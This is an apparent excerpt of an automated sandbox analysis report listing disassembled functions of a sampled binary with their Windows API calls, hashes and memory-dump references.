Opcode Fuzzy Hash: 221b4bd327ef1463202b965628094a04722779236e138742577cc21445975657
Instruction Fuzzy Hash: 4E014471A007045BD710DFAAD881A9FB7F4EF45314F00453EF958EB392DA79E8448B95

Function 00426A90 Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00426A98
SetActiveWindow.USER32(?,?,?,?,00426634,00000000,00426A10), ref: 00426AA5

Part of subcall function 00425F00: ShowWindow.USER32(?,00000009,?,00000000,?,004261EE,00000000,00000000,00400000,00425F30,?,004264C0), ref: 00425F1B

Part of subcall function 004263C8: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,?,00426ABE,?,?,?,?,00426634,00000000), ref: 00426403

SetFocus.USER32(00000000,?,?,?,?,00426634,00000000,00426A10), ref: 00426AD2

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Window$ActiveFocusIconicShow
String ID:
API String ID: 649377781-0
Opcode ID: 802f021f5054cb28ef52e7ce00dab693b961a060e36615cf535a3d460af30bef
Instruction ID: 2de3fc4dbb4864b13f1657b80bfb348f27ec78f9331d3e86d819f72cf79d8c74
Opcode Fuzzy Hash: 802f021f5054cb28ef52e7ce00dab693b961a060e36615cf535a3d460af30bef
Instruction Fuzzy Hash: 96F0D0717015208BCF40AFA9D885A9B2299EF09318F55447BBD04EF25BDA78DC00CB68

Function 0040A055 Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda1d8878a83066d21f4e9da80184933b3c088f8aeb93c0947520c61e1aaafaa
Instruction ID: 9e8a33e2b8fc40daec192886d159c992325180ba3c946053fac4c8650be2e21a
Opcode Fuzzy Hash: dda1d8878a83066d21f4e9da80184933b3c088f8aeb93c0947520c61e1aaafaa
Instruction Fuzzy Hash: E421F5742043449FC711EF39E956A9A7BA0EB86314B14C0BBE944AF3D2CA3D9C25C75E

Function 00418536 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00418577
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 00418595
GetWindowPlacement.USER32(?,0000002C), ref: 004185CB
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004185F2

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID:
API String ID: 568898626-0
Opcode ID: 822b67c4c08bf72358015f3715d04d995f4a357badf63b9be24e30df40eb8cf3
Instruction ID: bb89a4b669a67a47c6ff3058af4f4ec4762abfecc61c568161be3a92bb9735db
Opcode Fuzzy Hash: 822b67c4c08bf72358015f3715d04d995f4a357badf63b9be24e30df40eb8cf3
Instruction Fuzzy Hash: D50125712002047BDB10EE599CC1ED77799EB44764F15456AFD08DF246DA34DC8087A8

Function 00431404 Relevance: 3.0, APIs: 2, Instructions: 44clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004310C8: OpenClipboard.USER32(?), ref: 004310F6

SetClipboardData.USER32(?,?), ref: 0043144D
SetClipboardData.USER32(00000009,00000000), ref: 0043145E

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Clipboard$Data$Open
String ID:
API String ID: 3673704408-0
Opcode ID: f3417c3b4a40c40401d51f2902c5b24fa72693c37f032abc4d6cefa17c972aa4
Instruction ID: e79eed7f903002232b5bede3e1d3683023643466a3ad3cff7ba5216d188d331f
Opcode Fuzzy Hash: f3417c3b4a40c40401d51f2902c5b24fa72693c37f032abc4d6cefa17c972aa4
Instruction Fuzzy Hash: 92015E30A00208AFCB04DBA9CC82AAEB7F8FF0C704F500466F504E36A1EB795E04CB58

Function 00417E00 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417E2B
GetCapture.USER32 ref: 00417E34

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 007a1a19630d86b7299295e4c31335292bb5d1f4d3918c560a5693f3a850df28
Instruction ID: 778164d977166bf7bc777a4cd4a22b78963fddd0738fe90f05143738fb1bedfe
Opcode Fuzzy Hash: 007a1a19630d86b7299295e4c31335292bb5d1f4d3918c560a5693f3a850df28
Instruction Fuzzy Hash: 33F081313047014BD720962AC8C4AAB62F59F84358F1440BBF418C7761EB28DCC08759

Function 00431380 Relevance: 3.0, APIs: 2, Instructions: 43clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004310C8: OpenClipboard.USER32(?), ref: 004310F6

SetClipboardData.USER32(?,?), ref: 004313C9
SetClipboardData.USER32(00000009,00000000), ref: 004313DA

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Clipboard$Data$Open
String ID:
API String ID: 3673704408-0
Opcode ID: df1f0728b13ed81a64f94a87efa00f3c6888183ff7767604ec7b4dffabb916fa
Instruction ID: c5c5143e80c70f4e6a85b8050deb42603d6d2e3bbc3fe6e71dcd3a8432289857
Opcode Fuzzy Hash: df1f0728b13ed81a64f94a87efa00f3c6888183ff7767604ec7b4dffabb916fa
Instruction Fuzzy Hash: 31018430A00248AFDB04DBA9CC52AAFB3F8EF0C304F501876B400E36A1EB785E00CB18

Function 004064A4 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,00495ED9), ref: 004064BF
GetLastError.KERNEL32(00000000,?,?,?,?,00495ED9), ref: 004064E2

Part of subcall function 00406440: FileTimeToLocalFileTime.KERNEL32(?), ref: 0040646D
Part of subcall function 00406440: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0040647C

Part of subcall function 004064F0: FindClose.KERNEL32(?,004064E0,00000000,?,?,?,?,00495ED9), ref: 004064F9

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: FileTime$Find$CloseDateErrorFirstLastLocal
String ID:
API String ID: 976985129-0
Opcode ID: bc3803c3975c587aa03c551cbd7b02e20e56465a31b688694e1103bd117d771d
Instruction ID: 184e83074de459044b2a29fdcf70a34b3d56ba477fa8f84e85a43cb6c0a60992
Opcode Fuzzy Hash: bc3803c3975c587aa03c551cbd7b02e20e56465a31b688694e1103bd117d771d
Instruction Fuzzy Hash: 71E09BA270112057C724AFAE5C8155B55C8698476930A057FF902FB387D63CCC2143DD

Function 00426A48 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00426A4F

Part of subcall function 00426338: EnumWindows.USER32(Function_000262D0), ref: 0042635C
Part of subcall function 00426338: GetWindow.USER32(?,00000003), ref: 00426371
Part of subcall function 00426338: GetWindowLongA.USER32(?,000000EC), ref: 00426380
Part of subcall function 00426338: SetWindowPos.USER32(00000000,00426A10,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,00000003,?,?,?,00426A5F,?), ref: 004263B6

SetActiveWindow.USER32(?,?,?,00426627,00000000,00426A10), ref: 00426A63

Part of subcall function 00425F00: ShowWindow.USER32(?,00000009,?,00000000,?,004261EE,00000000,00000000,00400000,00425F30,?,004264C0), ref: 00425F1B

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Window$ActiveEnumIconicLongShowWindows
String ID:
API String ID: 2671590913-0
Opcode ID: 4225f75b093895f2485424636c17185a2166f0c3ac734e06049d90e53f2609b7
Instruction ID: 7ba5b3a27d99a41ba5ea5ce431529f903c4ace2e047b4e121ede5782110c12e5
Opcode Fuzzy Hash: 4225f75b093895f2485424636c17185a2166f0c3ac734e06049d90e53f2609b7
Instruction Fuzzy Hash: EFE09AB170121087DF00AF79D8C5B9A72A9BF48304F9545BABD0CDF29BD679DC408B64

Function 004591D4 Relevance: 2.0, Strings: 1, Instructions: 800COMMON

Download Yara Rule

Strings

ticalSection, xrefs: 0045921D, 00459229, 00459238, 00459244, 0045928E, 004592CF, 0045930C, 00459343, 0045938D, 0045939A, 00459406, 00459455, 00459462, 004594BD, 0045950B, 00459564, 00459596, 004595E4, 00459756, 004598BC, 00459987, 00459B1E, 00459CA5, 00459D72

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID: ticalSection
API String ID: 0-4264482612
Opcode ID: 616efae8734a2c2adc9f7d311cf7d28c235e38d0bd412c9af1142b101fd2e0c8
Instruction ID: 9b0bbc1f6f6d613dcbb087ddbd8ceb32b0b28169364df859860e567005d74615
Opcode Fuzzy Hash: 616efae8734a2c2adc9f7d311cf7d28c235e38d0bd412c9af1142b101fd2e0c8
Instruction Fuzzy Hash: 7072B330900149EBCF01DF95C886BDEBBB6AF4430AF1880B7EC546B297D7785A49CB59

Function 004663D0 Relevance: 2.0, Strings: 1, Instructions: 766COMMON

Download Yara Rule

Strings

ticalSection, xrefs: 00466419, 00466425, 00466434, 00466440, 004664A5, 004664DC, 00466526, 00466533, 0046659F, 004665EE, 004665FB, 00466656, 00466688, 004666D6, 0046672F, 0046677D, 004668D3, 00466A39, 00466B04, 00466C9B, 00466E22, 00466EEF

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID: ticalSection
API String ID: 0-4264482612
Opcode ID: ca14801314ac627b5da404b7e6ccc266d7617323a49893d879d1549fa55233da
Instruction ID: 17c5896cfe81d793f5db93024b1bf382853fe8001eb4abf66fadb4f385c772ad
Opcode Fuzzy Hash: ca14801314ac627b5da404b7e6ccc266d7617323a49893d879d1549fa55233da
Instruction Fuzzy Hash: 3962B730904149ABCF01DF95C885BCDBFB6EF44308F1580B7E8547B29AE7B99A05CB5A

Function 00412B78 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00412D75), ref: 00412D63

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
